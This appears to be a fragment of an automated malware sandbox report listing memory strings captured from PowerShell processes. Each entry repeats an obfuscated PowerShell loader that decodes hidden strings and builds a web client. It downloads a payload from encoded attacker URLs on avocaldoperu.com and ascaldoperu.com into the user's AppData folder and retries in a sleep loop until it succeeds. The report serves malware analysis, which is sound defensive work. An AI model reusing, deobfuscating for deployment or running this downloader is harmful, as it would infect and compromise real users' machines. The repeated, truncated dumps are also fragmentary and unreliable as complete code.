Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT i
              Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CFED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ure) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. 
SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)La ') ;Sloshily (Indband
              Source: powershell.exe, 00000005.00000002.2196688153.0000000002B3D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft.PowerShell.ConsoleHost, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msilIndbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. 
SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)
              Source: powershell.exe, 00000002.00000002.2489622695.0000020B74A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .il sorhblia kln,: ag vn,uachv,oeder.hi.ee .t es =kan.cev.w e-lrou,b ojtre,ocprt tst ybls ttg.e fmkr.slna.e.kt.e.mdw etrbdrcinlsoiajeovngyt');$lnindeholde+=$arninge[1];sloshily ($lnindeholde);sloshily (indbandtes 'fo$ung fn gac,vfleafrraiadeprt,hs s.krhadedea
              Source: powershell.exe, 00000002.00000002.2490651768.0000020B74B9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde)
              Source: powershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. 
SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(K
              Source: powershell.exe, 00000002.00000002.2361305747.0000020B5C7B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. 
SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.
              Source: powershell.exe, 00000005.00000002.2202717320.00000000073F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +%SystemRoot%\System32\mswsock.dllt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.er.slNA.e.kt.E
              Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CFD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5CFED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5CFCA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. 
Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.
              Source: powershell.exeBinary or memory string: yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes
              Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CFA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i 